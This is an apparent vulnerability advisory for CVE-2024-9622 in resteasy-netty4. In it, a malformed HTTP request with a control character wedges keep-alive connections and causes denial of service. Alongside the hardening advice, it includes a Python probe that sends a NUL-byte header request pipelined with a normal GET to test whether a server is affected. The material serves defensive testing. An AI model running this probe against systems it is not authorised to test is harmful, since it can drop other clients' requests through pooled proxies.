PT-2024-7028 · Unknown+2 · Resteasy-Netty4+2
Txema-Martinez-Scopely · Published 2024-10-07 · Updated 2025-07-10 · CVE-2024-9622
CVSS v4.0: 6.9 (Medium)
| Vector | AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N |
Name of the Vulnerable Software and Affected Versions
resteasy-netty4 library (affected versions not specified)
Description
A vulnerability was found in the resteasy-netty4 library arising from improper handling of malformed HTTP requests of the kind used in request-smuggling attacks. When a request containing an ASCII control character is sent, Netty's HttpObjectDecoder transitions into its BAD_MESSAGE state and discards every further byte received on that connection; because the server does not close the connection after the decoder failure, any subsequent legitimate requests pipelined or reused on the same connection are silently ignored and the client times out. Deployments behind a load balancer or reverse proxy that pools keep-alive connections to the backend are the most exposed, since one malformed request wedges a pooled connection over which other clients' requests are then routed. The impact is loss of availability (the CVSS vector scores only VA:L, with no confidentiality or integrity impact): a remote, unauthenticated attacker can trigger it with a single crafted request and no user interaction.
Recommendations
At the moment, there is no information about a newer version that contains a fix for this vulnerability. As general hardening for any Netty-based HTTP server, the inbound handler should check `decoderResult()` on every received `HttpObject` and, when it reports failure, answer with 400 and close the connection instead of continuing to read from it: once HttpObjectDecoder has entered BAD_MESSAGE it drops all further bytes on that connection, so leaving it open only keeps it wedged. Where a load balancer or reverse proxy sits in front of the service, rejecting requests that carry control characters in headers at that layer, and disabling upstream connection reuse until a fix is available, confines the effect to the attacker's own connection.
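To check whether a deployment exhibits the wedged-connection behaviour described above, the following Python probe (an added example, not code from the advisory or from the RESTEasy or Netty projects) pipelines two requests over one keep-alive connection: the first carries a control byte in a header value, the second is a plain GET. The choice of a NUL byte as the trigger, the `X-Probe` header name and the host/port arguments are assumptions. The verdict logic is the part to read: a server that closes the connection after the malformed request is handling the decoder failure, while one that keeps the connection open and never answers the second request shows the behaviour this advisory describes.

```python
"""Pipelined keep-alive probe for the wedged-connection behaviour.

Added example, not code from the advisory or from RESTEasy / Netty.
Assumptions: the target speaks HTTP/1.1 with keep-alive on host:port, and a
NUL byte in a header value is rejected by the server's header validation.
"""
import socket
import sys

# Assumed trigger byte: an ASCII control character inside a header value.
CONTROL_BYTE = b"\x00"


def build_probe(host: str, path: str = "/") -> bytes:
    """Two pipelined requests for one connection: a malformed one carrying
    CONTROL_BYTE in a header value, then a well-formed one."""
    head = b"GET " + path.encode() + b" HTTP/1.1\r\nHost: " + host.encode() + b"\r\n"
    malformed = head + b"X-Probe: a" + CONTROL_BYTE + b"b\r\n\r\n"
    wellformed = head + b"X-Probe: second\r\n\r\n"
    return malformed + wellformed


def count_responses(data: bytes) -> int:
    """Number of HTTP/1.x status lines in the raw bytes read from the socket."""
    return sum(1 for line in data.split(b"\r\n") if line.startswith(b"HTTP/1."))


def classify(responses: int, closed: bool, timed_out: bool) -> str:
    """Verdict from what came back on the single connection."""
    if responses >= 2:
        # Both requests were answered: the control byte did not trip the decoder.
        return "inconclusive: malformed request was accepted"
    if closed:
        # Server rejected the malformed request and dropped the connection: the
        # expected handling after a decoder failure.
        return "not affected: connection closed after malformed request"
    if timed_out:
        # Connection stayed open but the valid follow-up was never answered.
        return "affected: follow-up request ignored on open connection"
    return "inconclusive"


def probe(host: str, port: int, timeout: float = 5.0) -> str:
    """Send the pipelined pair on one connection and classify the outcome."""
    data, closed, timed_out = b"", False, False
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe(host))
        while count_responses(data) < 2:
            try:
                chunk = sock.recv(4096)
            except socket.timeout:
                timed_out = True
                break
            if not chunk:
                closed = True
                break
            data += chunk
    return classify(count_responses(data), closed, timed_out)


if __name__ == "__main__":
    # Usage: python3 probe.py <host> <port>   (test instances only)
    print(probe(sys.argv[1], int(sys.argv[2])))
```

Run it only against instances you are authorised to test, and run it both directly against the backend and through any load balancer in front of it: a pooled upstream connection that gets wedged affects other clients' requests, which the direct probe alone will not show.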
Weakness Enumeration
HTTP Request/Response Smuggling
Related Identifiers
CVE-2024-9622
Affected Products
Linuxmint
Ubuntu
Resteasy-Netty4